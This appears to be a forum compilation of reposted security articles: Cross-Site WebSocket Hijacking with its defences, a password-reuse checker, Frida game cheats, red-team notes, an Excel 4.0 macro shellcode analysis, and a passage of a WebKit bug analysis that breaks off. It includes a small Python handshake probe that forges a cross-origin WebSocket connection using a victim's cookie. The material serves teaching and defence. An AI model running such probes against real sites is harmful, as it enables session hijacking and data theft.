  10. Hacking WebSocket With Cross-Site WebSocket Hijacking attacks Vickie Li Nov 28 · 5 min read Photo by Thomas Kolnowski on Unsplash The Same-Origin Policy (SOP) is one of the fundamental defences deployed in modern web applications. It restricts how a script from one origin can interact with the resources of a different origin. Last time, we talked about the Same-Origin Policy and how it protects a site’s data from unauthorized access: Hacking the Same-Origin Policy How attackers bypass the fundamental Internet safeguard to read confidential data medium.com However, there are some edge cases that the SOP does not cover, and these can often be exploited by attackers to steal private information. Today, we are going to talk about one of these edge cases: WebSocket connections, and how attackers can hijack WebSocket connections to leak private data. Let’s dive in! What is WebSocket? WebSocket is, like HTTP, a communications protocol that enables interaction between a browser and a web server. The WebSocket protocol allows both servers and browsers to send messages to each other using a single TCP connection. This is very useful when trying to create real-time applications such as online games and live chat. For example, Slack’s web app uses WebSocket connections to sync messages in its chat functionality. In order for a web application to sync in real-time, web servers need to be able to actively push data to its clients. And this is where WebSocket comes in. Traditionally, HTTP only supports client-initiated communications. This means that every time the real-time application needs to be synced (for example, an online game updating its live leaderboard), the client’s browser would need to send an HTTP request to retrieve the data from the server. When an application is constantly doing this type of update, this traditional method incurs a lot of unnecessary overhead and ultimately slows down the application. Whereas the WebSocket protocol solves this problem by creating a persistent connection between the client and the server that allows both client and server-initiated data transfers. During the lifetime of a WebSocket connection, the client and the server are free to exchange any amount of data without incurring the overhead and latency of using traditional HTTP requests. How WebSocket connections are created A WebSocket connection between a client and a server is established through a WebSocket handshake. This process is initiated by the client sending a normal HTTP or HTTPS request to the server with the special header: “Upgrade: websocket”. If the server supports WebSocket connections, it will respond with a 101 status code (Switching Protocols). From that point on, the handshake is complete and both parties are free to send data to the other. Side note: WebSocket uses the ws:// URL scheme, and the wss:// URL scheme for secure connections. The problem with WebSocket As I mentioned in the Same-Origin Policy article, the SOP is a way of preventing unwanted data access from malicious domains. However, the Same-Origin Policy does not apply to WebSocket connections and modern browsers would not prevent data reads on a WebSocket connection across origins. This means that if an attacker can create a WebSocket connection using a victim’s credentials, that connection would have the same access as a legitimate connection, regardless of where the connection is coming from. 
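Since the handshake described above is just an HTTP request with an Upgrade header, it can help to see it spelled out on the wire. A minimal Python sketch using only the standard library — victim.example and the /chat path are placeholders, the cookie value is elided, and you should only point this at a host you are authorized to test:

import base64, os, socket

key = base64.b64encode(os.urandom(16)).decode()
handshake = (
    "GET /chat HTTP/1.1\r\n"
    "Host: victim.example\r\n"
    "Upgrade: websocket\r\n"
    "Connection: Upgrade\r\n"
    "Sec-WebSocket-Key: " + key + "\r\n"
    "Sec-WebSocket-Version: 13\r\n"
    "Origin: https://attacker.example\r\n"   # a browser sets this automatically for the embedding page
    "Cookie: session=...\r\n"                # and attaches the victim's cookies to the request
    "\r\n"
)
with socket.create_connection(("victim.example", 80)) as s:
    s.sendall(handshake.encode())
    print(s.recv(1024).decode(errors="replace"))   # "101 Switching Protocols" if the Origin is not validated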
Cross-Site WebSocket Hijacking (CSWSH)

A Cross-Site WebSocket Hijacking attack is essentially a CSRF on a WebSocket handshake. When a user is logged into victim.com in her browser and opens attacker.com in the same browser, attacker.com can try to establish a WebSocket connection to the server of victim.com. Since the user's browser automatically sends her credentials with any HTTP/HTTPS request to victim.com, the WebSocket handshake request initiated by attacker.com would contain the user's legitimate credentials. This means the resulting WebSocket connection (created by attacker.com) would have the same level of access as if it originated from victim.com. After the WebSocket connection is established, attacker.com can communicate directly with victim.com as a legitimate user.

Structure of an attack

To carry out the attack, an attacker would create a script that initiates a WebSocket connection to the victim server. She can then embed that script on a malicious page and trick a user into accessing the page. When the victim accesses the malicious page, her browser will automatically include her cookies in the WebSocket handshake request (since it's a regular HTTP request). The malicious script crafted by the attacker will now have access to a WebSocket connection created using the victim's credentials.

The impact of Cross-Site WebSocket Hijacking

Using a hijacked WebSocket connection, the attacker can now achieve a lot of things:

WebSocket CSRF: If the WebSocket communication is used to carry out sensitive, state-changing actions, attackers can use this connection to forge actions on behalf of the user. For example, attackers can post fake messages onto a user's chat groups.

Private data retrieval: If the WebSocket communication can be used to retrieve sensitive information via a client request, attackers can initiate fake requests to retrieve sensitive data belonging to the user.

Private data leaks via server messages: Attackers can also simply listen in on server messages and passively collect information leaked from these messages. For example, an attacker can use the connection to eavesdrop on a user's incoming notifications.

How to prevent Cross-Site WebSocket Hijacking

In order to prevent Cross-Site WebSocket Hijacking, an application needs to deny WebSocket handshake requests from unknown origins. There are two ways this can be achieved:

Check the Origin header: browsers automatically include an Origin header. This can be used to validate where the handshake request is coming from. When validating the Origin of the request, be sure to use a whitelist of URLs instead of a blacklist, and use a strict and rigorously tested check.

Use CSRF tokens for the WebSocket handshake request: applications could also use a randomized token on the WebSocket handshake request and validate it server-side before establishing the WebSocket connection. This way, if an attacker cannot leak or predict the random token, she will not be able to establish the connection.

WebSocket is a big part of many modern applications. However, it is often overlooked as a potential attack vector. It is important for developers and pentesters to be aware of this common pitfall and look out for these vulnerabilities before they are exploited in the wild.

As always, thanks for reading!

The Startup
Medium's largest active publication, followed by +532K people. Follow to join our community.

Written by Vickie Li
Basically a nerd. Studies web security. Stalks great hackers.
Creates god awful infographics. https://twitter.com/vickieli7 Sursa: https://medium.com/swlh/hacking-websocket-25d3cba6a4b9
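For the first mitigation described above (Origin checking), the safest pattern is an exact allowlist match rather than a regex. A framework-agnostic Python sketch — the hostnames are placeholders, and where you call this from depends on your WebSocket server:

from typing import Optional
from urllib.parse import urlsplit

ALLOWED_ORIGINS = {"https://victim.example", "https://app.victim.example"}  # your own origins

def origin_is_allowed(origin_header: Optional[str]) -> bool:
    # A missing Origin header usually means a non-browser client; decide per your threat model.
    if not origin_header:
        return False
    parts = urlsplit(origin_header)
    normalized = f"{parts.scheme}://{parts.netloc}".lower()
    return normalized in ALLOWED_ORIGINS   # exact allowlist match, no substring or regex pitfalls

# Reject the handshake (e.g. respond with HTTP 403) whenever origin_is_allowed(...) is False.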
  11. PAF Credentials Checker PCC's aim is to provide a high performing offline tool to easily assess which users are vulnerable to Password Reuse Attacks (a.k.a. Password Stuffing). The output of this tool is usually used to communicate with the vulnerable users to force them to change their password to one that has not leaked online. Features Highlights Only checks the password of internal users matching the IDs in external lists Highly parallel checking of credentials (defaults to 30 goroutines) Supports mixed internal hashing functions, useful if you have multiple hashing schemes Easy to extend and add your own internal hashing schemes Getting Started If you have a working Go environment, building the tool after cloning this repository should be as easy as running: go build The tool can be then launched using this command: ./paf-credentials-checker -creds credentials.txt -outfile cracked.txt leak1.txt [leak2.txt [leakN.txt ...]] You can find some test cases in the test_files directory. The different files on the command line are: credentials.txt contains your internal credentials, with one record per line following this syntax internalID0:InternalID1:mappingID:hashtype:hash:[salt[:salt[:...]] internalID0 and internalID1 are internal identifiers that will be written to the output file. mappingID is an ID that will be used to map the internal user to the external passwords lists hashtype is the short hash type that corresponds to the hashing function that should be used to parse the hash and salts and to check the credentials hash and salts, in the format required by the checking and extracting functions cracked.txt is a csv file in which each password reuse match will appear as a row containing the internalID0,internalID1 of the matched user. This file is being written live, so it will contain duplicates if your leak files contain duplicates. leak.txt is a file in the usual combo list format: mappingID:password Note: Usually the mappingID in the combo lists are usernames, emails or others fields containings PIIs. To avoid processing and storing those extremely sensitive information, a script is available in the importer directory to recreate combo lists files and change the mappingID with a heavily truncated md5 sum (by default first 6 characters of the hex output). Applying the same function to your internal mappingID will allow the matching logic to continue working. Please note that using a truncated hash that short will likely create some false positives (e.g. an internal user being matched to an external one that is not the same), but: this is expected, we want collisions to happen to limit the sensitivity of the information if there is a full false positive (e.g. an internal user matched to another external one that somehow had the same password), then the internal user probably used an extremely common password. Therefore it's not a bad idea to also ask him to change his password... Supported hashing functions In this initial release, only two functions are implemented to showcase the different functionalities. Short ID Verbose ID Function MD5 MD5RAW md5(password) MD5spSHA1sp MD5SaltPreSHA1SaltPre md5(salt1.UPPER(HEX(sha1(salt2.password)))) Adding a new hashing function Here is a todo list to add a new hashing function: Decide on a Short ID, used in your internal credentials file, and a Verbose ID, only used within the tool. 
Add the Verbose ID to the const list line 14 in credentialChecker.go Add a case in the detectHash function in extractHash.go to map the Short ID to the Verbose ID Create your extraction function in extractHash.go. The purpose of the extraction function is to parse the line from the internal credentials file from the hashtype field until the end and to create a new Hash object containing the proper hashtype (Verbose ID), hash and salts values. Add a case extractTokens function to map your Verbose ID with your new extraction function. Create your checking function in checkHash.go. The purpose of this function is to check a clear text password against the Hash object that was extracted in the previous step. Add a case with the Verbose ID in the function crackHash function in credentialChecker.go to map it to your new checking function Add new unit tests to verify that your extraction and checking functions are working accordingly Motivation While comparing users's passwords against known weak passwords is a best practice, using a massive list containing all the leaked passwords is both impractical if you have a lot of users and a strong hashing function, and also really bad from a user experience point of view as they will struggle to find a password that didn't appear in any breaches. However, relying on a more realistic blacklist of around 10.000 passwords will protect the users against attacker spraying bad passwords at scale but it will not help them in case they are reusing their password on another website that has suffered a breach. In this scenario, an attacker would just need to get those credentials from this third party website leak and test them on your website. If the user used the same password on both services, even if it was a strong password, his account would be at immediate risk of compromise. This attack scenario, called Password Stuffing or Password Reuse Attack has been trendy for several years as more and more massive data leaks are happening. This tool's aim is to fill this gap by allowing you to: Flag accounts that have been reusing the same set of credentials internally and on leaked websites Easily extend the tool to implement your own internal hashing function This tool maps IDs from the internal list with IDs in the external lists to only check credentials belonging to internal users for password reuse to avoid the pitfalls mentioned above. It is also highly parallel thanks to Go's goroutines (by default it creates 30 computing threads, tunable in the code). License This project is licensed under the The 3-Clause BSD License - see the LICENSE.md file for details Sursa: https://github.com/kindredgroup/paf-credentials-checker
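The MD5spSHA1sp row in the table above packs a lot into one line, so it can help to compute the same value outside the Go tool as a sanity check. A short Python equivalent — this treats the salts and password as strings and assumes the stored hash is the hex encoding of the outer md5, which is an assumption about the storage format rather than something the README states:

import hashlib

def md5_salt_pre_sha1_salt_pre(password: str, salt1: str, salt2: str) -> str:
    # inner: sha1(salt2.password), hex-encoded and upper-cased
    inner = hashlib.sha1((salt2 + password).encode()).hexdigest().upper()
    # outer: md5(salt1.UPPER(HEX(sha1(salt2.password))))
    return hashlib.md5((salt1 + inner).encode()).hexdigest()

print(md5_salt_pre_sha1_salt_pre("hunter2", "saltA", "saltB"))   # hypothetical test values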
  12. Hacking doom for fun, health and ammo Reading time ~19 min Posted by leon on 27 November 2019 Categories: Doom, Frida, Games, Reversing, Sensecon 2019, Reverse engineering Remember iddqd and idkfa? Those are two strings were etched into my brain at a very young age where fond memories of playing shareware Doom live. For SenseCon ’19, Lauren and Reino joined me as we dove into some reversing of chocolate-doom with the aim of recreating similar cheats. The results? Well, a video of it is shown below. We managed to get cheats working that would: Increment your ammo instead of decrement it. Increment everyone’s health for the amount it would have gone down for. Yes, you read right, everyone. Toggle cheats just like how they behaved in classic doom. The source code for our cheats live here if you want to play along, or maybe even contribute new ones The setup The original Doom game was released in 1993, built for OSs a little different to what we have today. The chocolate-doom project exists and aims to be as historically correct as possible while still working on modern operating systems. Perfect nostalgia. We downloaded chocolate-doom for Windows from here, extracted and sourced a shareware WAD to use. We also set some rules for our project. The chocolate-doom source code is available, however, we did not want to reference it at all. Once extracted, chocolate-doom.exe was a stripped PE32 executable. This meant that reverse engineering efforts would be a little harder, but that was part of the challenge and learnings we wanted. Using tools such as IDA Freeware, CheatEngine and WindDBG was considered fair game though. However, any patches or binary modifications had to be implemented using Frida, and not by manually patching chocolate-doom.exe. Finding where to start – Windows Sometimes, getting started is the hardest part. We decided to get a bit of a kick start by using CheatEngine to find interesting code paths based on the games UI. First up was finding out what code was responsible for the ammo count. CheatEngine is a memory scanner and debugger that is particularly suited for this task. You can attach to a running process with CheatEngine, and scan the process’ memory to find all instances of a particular value. If our ammo count is currently 49, we can search for all instances of the value 49 in memory. There may however be quite a number of instances of this value within the process’ memory – a scan will often return several. Additionally, not all instances will be related to the ammo count. Searching for the value 49 returns several memory locations To pinpoint exactly the right location, we can can change the value a bit, and then rescan using CheatEngine for any instances of the previously found value that was altered by the same amount. We could do this by shooting the handgun a few times and taking note of by how much the ammo count was changed. We can then use the “Next Scan” function and the “Decreased value by” scan type option to search in CheatEngine for a value that has also changed by the same amount. This decreased the amount of possible locations for the ammo count to only three. Only three possible locations found for the ammo count. At this point all the possible instances could be either the original, or a copy of the original ammo count. We can watch these memory locations to determine which instructions write to them in an attempt to identify the code that is responsible for decreasing the ammo. 
To do this in CheatEngine, you can simply click right a watched memory location, and select “Find out what writes to this address”. Watching updates to a memory location. When watching the first two locations we identified, we saw instructions rapidly writing to the target pointers even while the game was paused. These instructions also didn’t subtract from the ammo count which meant that these instructions were probably not what we were looking for. A rapid firing instruction on the watched memory location. The third match we had saw writes only when the handgun was fired. The instruction was a subtraction by one and therefore likely the instruction to decrease the ammo count we are interested in. CheatEngine allows you to disassemble code around the identified instruction. Using this, we had the location of the instruction responsible for decreasing the ammo count when the handgun was shot at 0x0430A2c. Instruction to reduce the handgun’s ammo by 1 Finding where to start – Linux While not the primary target for our project, we also had a go at patching the chocolate-doom ELF binary. This was all done on an Ubuntu machine using similar tools as mentioned above, however, cheat engine was not available for Linux. Instead, to start finding interesting code paths in the ELF binary, we used a tool called scanmem which is similar to CheatEngine, but only gives the addresses of a value in memory and not which instruction alters it. After starting up scanmem and entering the changing ammo value a couple of times, it also isolated 3 possible addresses for ammo. These would change at each invocation of chocolate-doom because of the use of ASLR. Scanmem showing the addresses storing the current ammo value. To find out what instructions write to the identified pointers, we used gdb and set a watchpoint on each address found by scanmem. Watch points set for the ammo decrease. We then continued the game and shot once with the handgun to trigger a watchpoint. You can see the old and new ammo value below. Watchpoint triggered after shooting with the handgun. Next was to check where the instruction pointer was and to view the instructions surrounding it to see if we could spot the exact instruction that subtracts one from the ammo value each time a shot is fired. rip and the surrounding instructions As you can see, there is a sub instruction just before where the instruction pointer is currently sitting. To search for the exact instruction in IDA, we viewed the hex value of the instruction in gdb. Viewing the sub instruction in hex Because the below values are little endian, we searched for the opcodes 83 ac 83 a8 in IDA and had the offset location of the instruction responsible for decreasing the ammo count when the handgun was shot, i.e. 0x49F28. Watching functions with Frida With some target offsets at hand, we could start to watch them in real time with Frida. Frida has an Interceptor API, that allows you to “intercept” function calls and execute code as a function prolog or epilog. One also has access to the arguments and the return value using the Interceptor, making it possible to log and if needed, change these values. Given that we know which instructions were writing to memory regions that contained the ammo value for our handgun, we used IDA to analyse the function around the instruction to find the entry point for it. This way we would know which memory address to use with the Interceptor. 
Entrypoint into the function that affected the handgun’s ammo As you can see in the screenshot above, the function starts at 0x4309f0. With a base of 0x400000 that means that the function’s offset is just 0x309f0 from that (this will be important later). With a known offset, our first Frida script started. This script would simply find the chocolate-doom module’s base address, calculate the offset to the function we are interested in and attach the Interceptor. The Interceptor onEnter callback would then simply log that the function triggered. Interceptor attached to the hangun fire function’s entry point We can see this script in action when attached to chocolate-doom below. Knowing that function triggers as we fire the handgun helps confirm that we are on the right track. Our first cheat We figured we would start by writing a simple patch that just replaces the instruction to decrement the ammo count by 1 with NOP instructions. Frida has a Code writer module that can help with this. The original decrement instruction was sub dword ptr [ebx+edx*4+0A4h], 1 which is represented as 8 opcodes when viewed in hex. Hex opcodes for the instruction decrementing ammo of the handgun The code writer could be used to patch 0x430a2c with exactly 8 NOP instructions using the putNopPadding(8) method on a code writer instance. Frida code writer used to replace the ammo decrementing instructions with 8 NOPs. Applying this patch meant that we no longer ran out of ammo with the handgun. Improving the first ammo cheat To test how effective our NOP-based cheat was, we used one of the original cheats (“idkfa”) to get all of the available guns and ammo and see if it worked for those as well. Turns out, it didn’t, and some investigation revealed that each gun had its own ammo decrementing function. All functions eventually called an opcode that would SUB 0x1 from an ammo total (except for the machine gun that would SUB 0x2). An improvement was necessary. We didn’t want to hardcode all of the instructions we found and looked for other options. When searching in IDA for the opcodes 0x83 0xac (part of the ammo SUB opcodes for sub dword ptr [ebx+edx*4+0A4h], 1), we noticed that the only matches were those that formed part of functions that decremented ammo. Frida has a memory scanner that we could use to match the locations of these functions that we were interested in dynamically (as 0x83 0xac), available as Memory.scanSync(). We then used the same Memory.patchCode() function to simply override the opcodes to ADD instead of SUB as a simple two-byte patch Ammo patcher to increment instead of decrement ammo for each matched opcode search This patch was a little more generic and did not require any hardcoded offsets to work. Depending on what you are working with, a better search may be to use some of the wildcarding features of Memory.scanSync() so that you can have much more specific matches. With our patch applied, all weapons now incremented their ammo count as you fired. Writing a health cheat After fiddling with ammo related routines, we changed our focus to health. We used the same CheatEngine technique as before to figure out where our health was being stored and who was writing to those locations. Finding the health locations however turned out to be a bit more tricky, as around four to five different locations would appear between different searches. Some of these locations had rapid firing instructions executing writes on them, as before with the ammo count, and were thus ignored. 
Around three locations had instructions which triggered when the player’s health decreased. The locations for the player’s health. The instructions, however, were not sub instructions, but rather mov instructions. Looking at the disassembled code, we could, however, spot the sub instruction a few lines higher up. One of the set of instructions that triggered when a player’s health decreased. Note the sub instruction above the mov instruction, which did the actual subtraction. What is important to note is that the instruction was a subtraction between two registers, i.e. sub eax, esi. This is a fairly common instruction, and meant that we couldn’t just scan for all instances of it in memory and replace it with an add instruction like we did with the ammo increment patch. Instead, we manually went to the location of each of the sub instructions and changed it to an add instruction. When viewed as opcodes, sub eax, esi is 0x29 0xF0, while add eax, esi is 0x01 0xF0. So, a patch was simply a case of swapping out the 0x29 for a 0x01. The sub instructions for the three different functions were at 0x3DEEC, 0x2C385, and 0x2c39. Patching 0x3DEEC, however, often caused the game to crash, so it was removed later on. Patching 0x2C385, and especially 0x2c39, made the player’s health increase when attacked. It also had the side effect of making all monsters’ health increase as well when they are attacked – this might be because both the player and monsters in the game use the same logic for health deduction. ¯\_(ツ)_/¯ Health patch to ADD instead of SUB With this patch applied, the incrementing health cheat could be seen in the following video. Making our patches, cheats – static analysis Up to now we had been patching chocolate-doom for our cheats as soon as Frida was injected and our scripts were run. We really wanted to make our cheats behave like the originals did by simply typing them in the game, “iddqd” and “idkfa” style. To implement this, the chocolate-doom binary was analysed to find the logic that handles the current cheats. We knew that if you typed “idkfa”, the game would pop up a message saying “VERY HAPPY AMMO ADDED”. Message after using the idkfa cheat A text search in IDA for this message revealed the location where it was used. Very Happy Ammo Added search in IDA We focussed on the function this reference was in and realised that it was an incredibly long function. In fact, it appeared as though all of the cheats were processed by this single function, with a bunch of branches for each cheat. Code paths could be seen in the IDA graph view and gave us a reasonable idea of its complexity. IDA graph view of the cheat function All of the different cheat branches also made a call to a function that lived at 0x040FE90. This function took two arguments, one being a character array and the other an integer, and appeared to be comparing a character to a string. Comparison function called for each cheat in the previous routine. Making our patches, cheats – dynamic analysis We decided to have a look at the invocation of this cheat comparison function (henceforth called cheat_compare) at runtime, dumping the arguments it receives. Just as we had previously used the Frida Interceptor to attach to a function, we simply calculated the offset for cheat_compare and logged the arguments it received. This would also give us an opportunity to try and discover how to trigger this function in game. 
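A minimal version of that argument-dumping hook might look like the following (the 0xFE90 offset is simply the 0x040FE90 address above minus the 0x400000 base; treat the whole snippet as illustrative rather than the authors' exact script):

// sketch: log what cheat_compare receives on every call
var base = Process.getModuleByName('chocolate-doom').base;   // module name assumed
var cheatCompare = base.add(0xfe90);

Interceptor.attach(cheatCompare, {
    onEnter: function (args) {
        // arg0: pointer to the candidate cheat string; arg1: unknown at this point
        console.log('cheat: ' + args[0].readCString() + ', arg1: ' + args[1]);
    }
});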
From IDA we knew the first argument was a character array, so we just dumped the raw string using the readCString() Frida method for that. For the second argument, we weren’t entirely sure what it would be, so we left it raw for now. Argument dumping using the Frida Interceptor for cheat_compare With this script hooked, the results were rather… surprising… Every keypress the game received appeared to enter the identified compare function we called cheat_compare. Even arrow keys! In the video demo above, we slowly entered the cheat “iddqd”, where you can see many of the possible cheats Doom has being compared to the hex value of the ASCII character we entered. Once the cheat matched, we moved Doom guy left a few times using an arrow key, which is where values such as 0xffffffac entered the routine for a bunch of possible cheats too. Without understanding the full cheat routine, we were sure these would never match something legitimate, so we suspected we may have found an optimisation opportunity here. Making our patches, cheats – implementation The two arguments cheat_compare was receiving were enough for us to start building our own implementation. In fact, receiving the keycodes entered was all we needed. We could have gone and tried to patch the original routine to match some new strings and trigger our patches, but instead we chose an easier way out. We can read the keycodes that cheat_compare received, perform some tests for our cheats and then let the original function continue as normal. Herein lies an important concept I suspect many don’t immediately realise when using Frida. While Frida is a fantastic runtime instrumentation library, it can also be used to easily execute some JavaScript logic from within any function. In other words, we can introduce and execute code that was *not* part of the original binary, from within that binary. We don’t have to patch some code to jump to opcodes we have written; no, we can just execute pure JavaScript. The cheat_compare method, admittedly, was a little confusing. We decided to use the keycode we got as an argument, but had to work around the fact that we would receive the same keycode a number of times, as the method was repeatedly called for different cheats with the same keycode. As a result, we decided on simply recording unique keycodes. This introduced only one limitation: our cheats couldn’t have repeating characters. The result was a method that would check a character and append it if it was unique, returning the full recorded buffer if a new character was added. Method used to record keycodes received in cheat_compare() Next, we attached to cheat_compare and fired this new getCheatFromBufWithChar() to get the buffer of characters that were entered thus far. If a buffer ended with one of our strings, we fired the relevant patch to activate the cheat! To optimise the routine a little, we exited early if the entered keycode was not in the ASCII printable range. cheat_compare entrypoint used to match new, custom cheats The result of this script meant that any unique ASCII characters that were read would be compared to toggle the status of a cheat. This also meant that we had to write smaller routines that would undo the patches we wrote, but those were relatively easy as we already knew the offsets and original opcodes. The final script to play with these cheats is available here. Conclusion While choosing Doom may have been an easy target, we learnt a lot and got to play games while at it! 
We hope this inspires you to dig a little deeper into Frida and experiment more with it. Sursa: https://sensepost.com/blog/2019/hacking-doom-for-fun-health-and-ammo/
  13. What is this? These are publicly accessible personal notes at https://ired.team and https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques about my pentesting / red teaming experiments in a controlled environment that involve playing with various tools and techniques used by penetration testers, red teams and advanced adversaries. Warning: do not take everything or anything for granted, nor expect the notes to be very detailed or to cover the techniques or the artifacts they produce in full, and always consult additional resources. The following sub-pages of this page will explore some of the common offensive security techniques involving gaining code execution, lateral movement, persistence and more. This is my way of learning things - I learn by doing, repeating and taking notes. Most of these techniques are discovered by other security researchers and I do not claim their ownership. I try to reference the sources I use the best I can, but if you think I've missed something, please get in touch and I will fix it immediately. The Goal The goal of this project is simple - read other researchers' work, execute some common/uncommon attacking techniques in a lab environment and:
understand how the attacks can be performed
write code to further the understanding of some of the tools and techniques
see what most common artifacts the techniques leave behind
try out various industry tools and become more proficient in using them
take notes for future reference
Social Follow me on Twitter: https://twitter.com/spotheplanet Sursa: https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques
  14. Colin Hardy Here I describe how you can analyse a very stealthy way to execute shellcode via Process Injection using an old-skool Excel macro technique known as Excel 4.0 Macros. This seems to be a technique favoured by many APTs and Red Teams given the lack of detection by lots of anti-malware technology. The sample attempts to inject shellcode that transpires to be a Cobalt Strike beacon, which uses Domain Fronting to access its C2. The sample was provided by Arti Karahoda, definitely give him a follow: https://twitter.com/w1zzcap The sample can be obtained from here: https://app.any.run/tasks/e8db83aa-89... Also, I mention a few resources in the video, as follows: https://outflank.nl/blog/2018/10/06/o... https://d13ot9o61jdzpp.cloudfront.net... http://www.hexacorn.com/blog/2015/12/... Thanks for the sample Arti! Hope you all like the video and the techniques used, and hopefully this will help protect you in your own environments. If you liked the video, hit the thumbs up. If you loved it, please subscribe. Find Me: https://twitter.com/cybercdh https://colin.guru Thanks! Colin
  15. Diving Deep Into a Pwn2Own Winning WebKit Bug November 26, 2019 | Ziad Badawi SUBSCRIBE Pwn2Own Tokyo just completed, and it got me thinking about a WebKit bug used by the team of Fluoroacetate (Amat Cama and Richard Zhu) at this year’s Pwn2Own in Vancouver. It was a part of the chain that earned them $55,000 and was a nifty piece of work. Since the holidays are coming up, I thought it would be a great time to do a deep dive into the bug and show the process I used for verifying their discovery. Let’s start with the PoC: First of all, we need to compile the affected WebKit version which was Safari version 12.0.3 at the time of the springtime Pwn2Own 2019 contest. According to Apple's releases, this translates to revision 240322. svn checkout -r 240322 https://svn.webkit.org/repository/webkit/trunk webkit_ga_asan Let's compile it with AddressSanitizer (ASAN). This will allow us to detect memory corruption as soon as it happens. ZDIs-Mac:webkit_ga_asan zdi$ Tools/Scripts/set-webkit-configuration --asan ZDIs-Mac:webkit_ga_asan zdi$ Tools/Scripts/build-webkit # --jsc-only can be used here which should be enough We are going to use lldb for debugging because it is already included with macOS. As the POC does not include any rendering code, we can execute it using JavaScriptCore (JSC) only in lldb. For jsc to be executed in lldb, its binary file needs to be called instead of the script run-jsc. This file is available in WebKitBuild/Release/jsc and an environment variable is required for it to run correctly. I should point out that: env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release can be run within lldb, but placing it in a text file and passing that to lldb -s is the preferred method. ZDIs-Mac:webkit_ga_asan zdi$ cat lldb_cmds.txt env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release r Let’s start debugging. It crashes at 0x6400042d1d29: mov qword ptr [rcx + 8*rsi], r8, which appears to be an out-of-bounds write. The stack trace shows that this occurs in the VM, meaning in compiled or JIT’ed code. We also notice that rsi, used as the index, contains 0x20000040. We have seen that number before in the POC. It is the size of bigarr! (minus one), which is essentially NUM_SPREAD_ARGS * sizeof(a). In order to see the JITed code, we can set the JSC_dumpDFGDisassembly environment variable so jsc can dump compiled code in DFG and FTL. ZDIs-Mac:webkit_ga_asan zdi$ JSC_dumpDFGDisassembly=true lldb -s lldb_cmds.txt WebKitBuild/Release/jsc ~/poc3.js This will dump a lot of extraneous assembly. So, how are we going to pinpoint relevant code? We know that the crash happens at 0x6400042d1d29: mov qword ptr [rcx + 8*rsi], r8. Why don’t we try searching for that address? It might lead to something relevant. Bingo! Right in the DFG. The NewArrayWithSpread is called when creating a new array using the spread operator ... in the DFG JIT tier. This occurs in function f that is generated by gen_func and called in a loop. The main reason for iterating ITERS times in f is to make that part of the code hot, causing it to be optimized by the DFG JIT tier. Digging through the source code, we find the function SpeculativeJIT::compileNewArrayWithSpread in Source/JavaScriptCore/dfg/DFGSpeculativeJIT.cpp. This is where DFG emits code. Emitting code means writing the JIT-produced machine code into memory for later execution. We can understand that machine code by taking a look at compileNewArrayWithSpread. 
We see compileAllocateNewArrayWithSize() is responsible for allocating a new array with a certain size. Its third parameter, sizeGPR, is passed to emitAllocateButterfly() as its second argument, which means it will handle allocating a new butterfly (the memory space containing the values of a JS object) for the array. If you aren’t familiar with the butterfly of JSObject, more info may be found here. Jumping to emitAllocateButterfly(), we see that the size parameter sizeGPR is shifted 3 bits to the left (multiplied by 8) and then added to the constant sizeof(IndexingHeader). To make things simpler, we need to match the actual machine code to the C++ code we have in this function. The m_jit field is of type JITCompiler. DFG::JITCompiler is responsible for generating JIT code from the dataflow graph. It does so by delegating to the speculative & non-speculative JITs, which generate to a MacroAssembler (which the JITCompiler owns through an inheritance relationship). The JITCompiler holds references to information required during compilation, and also records information used in linking (e.g. a list of all calls to be linked). This means the calls you see, such as m_jit.move(), m_jit.add32(), etc., are functions that emit assembly. By tracking each one we will be able to match it with its C++ counterpart. We configure lldb with our preference of Intel assembly, in addition to the malloc debugging feature for tracking memory allocations.
ZDIs-Mac:~ zdi$ cat ~/.lldbinit
settings set target.x86-disassembly-flavor intel
type format add --format hex long
type format add --format hex "unsigned long"
command script import lldb.macosx.heap
settings set target.env-vars DYLD_INSERT_LIBRARIES=/usr/lib/libgmalloc.dylib
settings set target.env-vars MallocStackLogging=1
settings set target.env-vars MallocScribble=1
Because a large size is being allocated with Guard Malloc enabled, we need to set another environment variable that will allow such an allocation.
ZDIs-Mac:webkit_ga_asan zdi$ cat lldb_cmds.txt
env DYLD_FRAMEWORK_PATH=/Users/zdi/webkit_ga_asan/WebKitBuild/Release
env MALLOC_PERMIT_INSANE_REQUESTS=1
r
JSC_dumpDFGDisassembly will dump assembly in AT&T format, so we run disassemble -s 0x6400042d1c22 -c 70 to get it in Intel flavor, which will end up as the following: Let us try to match some code from emitAllocateButterfly(). Looking at the assembly listing, we can match the following: It is time to see what the machine code is trying to do. We need to set a breakpoint there and see what is going on. To do that, we added a dbg() function to jsc.cpp before compilation. This will help a lot in breaking into JS code whenever we want. The compiler complained that exec in the EncodedJSValue JSC_HOST_CALL functionDbg(ExecState* exec) function was not used, so it failed. To get around that, we just added exec->argumentCount();, which should not affect execution. Let’s add dbg() here, because the actual NewArrayWithSpread function will be executed during the creation of bigarr. Running JSC_dumpDFGDisassembly=true lldb -s lldb_cmds.txt WebKitBuild/Release/jsc ~/poc3.js again will dump the assembly and stop at: This breaks exactly before the creation of bigarr, and you can see the machine code for NewArrayWithSpread. Let us put a breakpoint on the start of the function and continue execution. The breakpoint is hit! Before stepping through, let’s talk a little about what a JS object looks like in memory. describe() is a nice little function that only runs in jsc. 
It shows us where a JS object is located in memory, its type, and a bit more, as displayed below: Notice above how the arr_dbl object changes types from ArrayWithDouble to ArrayWithContiguous after adding an object. This is because its structure changed: it no longer stores only double values but multiple types. A JS object is represented in memory as follows: Let’s start with the arr array in the example above. By dumping the object address 0x1034b4320, we see the two quadwords above. The first is the JSCell and the second is the butterfly pointer. The JSCell consists of:
-- StructureID m_structureID; # e.g. 0x5f (95) in the first quadword of the arr object (4 bytes)
-- IndexingType m_indexingTypeAndMisc; # 0x05 (1 byte)
-- JSType m_type; # 0x21 (1 byte)
-- TypeInfo::InlineTypeFlags m_flags; # 0x8 (1 byte)
-- CellState m_cellState; # 0x1 (1 byte)
